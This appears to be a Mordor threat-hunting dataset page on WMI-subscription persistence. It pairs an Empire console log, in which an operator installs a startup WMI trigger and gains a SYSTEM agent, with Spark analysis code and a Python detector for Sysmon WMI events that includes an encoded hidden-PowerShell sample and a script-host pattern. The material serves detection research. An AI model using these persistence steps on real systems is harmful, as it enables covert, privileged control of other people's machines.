Empire Elevated WMI Eventing
Metadata

| Field | Value |
|---|---|
| Author | Roberto Rodriguez @Cyb3rWard0g |
| Creation Date | 2019/05/18 |
| Modification Date | 2020/09/20 |
| Tactics | |
| Techniques | ['T1546.003'] |
| Tags | ['Local WMI Eventing', 'WMI Event Subscriptions'] |
Dataset Description
This dataset represents adversaries leveraging WMI subscriptions locally for persistence.
Datasets Downloads

| Dataset Type | Link |
|---|---|
| Host | |
Adversary View
(Empire: powershell/privesc/bypassuac_fodhelper) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
28BNF7RH ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5392 5/0.0 2020-09-04 20:31:17 http
W2TBCPHU ps 172.18.39.5 WORKSTATION5 THESHIRE\pgustavo powershell 5584 5/0.0 2020-09-04 20:42:01 http
13ZK6G7M ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5676 5/0.0 2020-09-04 20:41:59 http
(Empire: agents) > interact 13ZK6G7M
(Empire: 13ZK6G7M) >
(Empire: 13ZK6G7M) > usemodule persistence/elevated/wmi*
(Empire: powershell/persistence/elevated/wmi) > info
Name: Invoke-WMI
Module: powershell/persistence/elevated/wmi
NeedsAdmin: True
OpsecSafe: False
Language: powershell
MinLanguageVersion: 2
Background: False
OutputExtension: None
Authors:
@mattifestation
@harmj0y
@jbooz1
Description:
Persist a stager (or script) using a permanent WMI
subscription. This has a difficult detection/removal rating.
Comments:
https://github.com/mattifestation/PowerSploit/blob/master/Pe
rsistence/Persistence.psm1
Options:
Name Required Value Description
---- -------- ------- -----------
Agent True 13ZK6G7M Agent to run module on.
Listener True http Listener to use.
DailyTime False Daily time to trigger the script
(HH:mm).
AtStartup False True Switch. Trigger script (within 5
minutes) of system startup.
FailedLogon False Trigger script with a failed logon
attempt from a specified user
SubName True Updater Name to use for the event subscription.
ExtFile False Use an external file for the payload
instead of a stager.
Cleanup False Switch. Cleanup the trigger and any
script from specified location.
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
Proxy False default Proxy to use for request (default, none,
or other).
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
(Empire: powershell/persistence/elevated/wmi) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked 13ZK6G7M to run TASK_CMD_WAIT
[*] Agent 13ZK6G7M tasked with task ID 1
[*] Tasked agent 13ZK6G7M to run module powershell/persistence/elevated/wmi
(Empire: powershell/persistence/elevated/wmi) >
WMI persistence established using listener http with OnStartup WMI subsubscription trigger.
(Empire: powershell/persistence/elevated/wmi) >
(Empire: powershell/persistence/elevated/wmi) >
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5
[*] New agent PYA28EDF checked in
[+] Initial agent PYA28EDF from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to PYA28EDF at 172.18.39.5
(Empire: powershell/persistence/elevated/wmi) >
(Empire: powershell/persistence/elevated/wmi) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
28BNF7RH ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5392 5/0.0 2020-09-04 20:31:17 http
W2TBCPHU ps 172.18.39.5 WORKSTATION5 THESHIRE\pgustavo powershell 5584 5/0.0 2020-09-04 20:43:48 http
13ZK6G7M ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5676 5/0.0 2020-09-04 20:43:48 http
PYA28EDF ps 172.18.39.5 WORKSTATION5 *THESHIRE\SYSTEM powershell 7480 5/0.0 2020-09-04 20:49:29 http
(Empire: agents) > interact PYA28EDF
(Empire: PYA28EDF) > shell whoami
[*] Tasked PYA28EDF to run TASK_SHELL
[*] Agent PYA28EDF tasked with task ID 1
(Empire: PYA28EDF) >
nt authority\system
..Command execution completed.
(Empire: PYA28EDF) >
(Empire: PYA28EDF) >
Explore Mordor Dataset
Initialize Analytics Engine
from openhunt.mordorutils import *
spark = get_spark()
Download & Process Mordor File
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/persistence/host/empire_wmi_local_event_subscriptions_elevated_user.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable
Get to know your data
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+------------------------------------+-------+-----+
|Hostname |Channel |EventID|count|
+---------------------------+------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|12 |18003|
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|10 |17918|
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|13 |11497|
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|7 |9531 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|10 |2785 |
|WORKSTATION5.theshire.local|security |5447 |2715 |
|WORKSTATION5.theshire.local|security |4658 |2629 |
|MORDORDC.theshire.local |Microsoft-Windows-Sysmon/Operational|10 |1675 |
|WORKSTATION5.theshire.local|security |4656 |1361 |
|WORKSTATION5.theshire.local|security |4690 |1285 |
|WORKSTATION5.theshire.local|security |4663 |1083 |
|WORKSTATION5.theshire.local|security |4703 |997 |
|WORKSTATION5.theshire.local|security |5156 |482 |
|MORDORDC.theshire.local |Microsoft-Windows-Sysmon/Operational|7 |402 |
|WORKSTATION5.theshire.local|security |5158 |372 |
|WORKSTATION5.theshire.local|security |4673 |347 |
|MORDORDC.theshire.local |Security |5156 |314 |
|WORKSTATION5.theshire.local|Windows PowerShell |800 |286 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|9 |270 |
|MORDORDC.theshire.local |Microsoft-Windows-Sysmon/Operational|12 |252 |
+---------------------------+------------------------------------+-------+-----+
only showing top 20 rows
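As an added detection-side example (not part of this Mordor page or of the Empire module it records), the Python below joins Sysmon WMI events 19, 20 and 21 into filter/consumer pairs per host and flags the shape the adversary view above creates: a CommandLineEventConsumer named Updater that launches PowerShell, bound to a filter that polls system uptime. It assumes Sysmon's WMI event field names (Name, Query, Type, Destination, Consumer, Filter) and that the AtStartup option is implemented as an uptime-polling __EventFilter, as PowerSploit's Persistence module does; the sample events are constructed, not rows from the dataset.

```python
import re
from collections import defaultdict
# Constructed Sysmon WMI events (19 filter, 20 consumer, 21 binding); made-up values, not dataset rows.
SAMPLE_EVENTS = [
    {"EventID": 19, "Hostname": "WORKSTATION5", "Operation": "Created", "Name": "Updater",
     "EventNamespace": "root\\subscription",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "
              "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240"},
    {"EventID": 20, "Hostname": "WORKSTATION5", "Operation": "Created", "Name": "Updater",
     "Type": "Command Line", "Destination": "powershell.exe -NoP -W Hidden -enc <placeholder>"},
    {"EventID": 21, "Hostname": "WORKSTATION5", "Operation": "Created",
     "Consumer": 'CommandLineEventConsumer.Name="Updater"', "Filter": '__EventFilter.Name="Updater"'},
    # Default Windows binding, included to show the join does not flag benign pairs.
    {"EventID": 19, "Hostname": "WORKSTATION6", "Operation": "Created", "Name": "SCM Event Log Filter",
     "EventNamespace": "root\\subscription", "Query": "select * from MSFT_SCMEventLogEvent"},
    {"EventID": 20, "Hostname": "WORKSTATION6", "Operation": "Created", "Name": "SCM Event Log Consumer",
     "Type": "NTEventLog", "Destination": ""},
    {"EventID": 21, "Hostname": "WORKSTATION6", "Operation": "Created", "Filter": '__EventFilter.Name="SCM Event Log Filter"',
     "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"'},
]

NAME_RE = re.compile(r'\.Name="([^"]+)"')  # extracts the object name from a 21-event path
def wmi_subscriptions(events):
    """Join Sysmon 19/20/21 'Created' events per host into filter/consumer pairs."""
    filters, consumers, bindings = defaultdict(dict), defaultdict(dict), []
    for e in events:
        if e.get("Operation") != "Created":
            continue  # modifications/deletions do not establish new persistence
        host = e["Hostname"]
        if e["EventID"] == 19:
            filters[host][e["Name"]] = e
        elif e["EventID"] == 20:
            consumers[host][e["Name"]] = e
        elif e["EventID"] == 21:
            bindings.append((host, e))
    subs = []
    for host, b in bindings:
        f_name = NAME_RE.search(b["Filter"]).group(1)
        c_name = NAME_RE.search(b["Consumer"]).group(1)
        f, c = filters[host].get(f_name, {}), consumers[host].get(c_name, {})
        subs.append({"host": host, "filter": f_name, "consumer": c_name, "query": f.get("Query", ""),
                     "type": c.get("Type", ""), "destination": c.get("Destination", "")})
    return subs

def is_suspicious(sub):
    """Command-line consumer that starts a script host, or a filter polling uptime (startup trigger)."""
    shell = sub["type"] == "Command Line" and re.search(
        r"powershell|cmd\.exe|wscript|cscript|mshta", sub["destination"], re.I)
    return bool(shell or "SystemUpTime" in sub["query"])
```

On the real dataset the same join runs over the Sysmon channel filtered to EventID IN (19, 20, 21), which the channel/EventID summary above does not list because they sit below its top-20 cut-off.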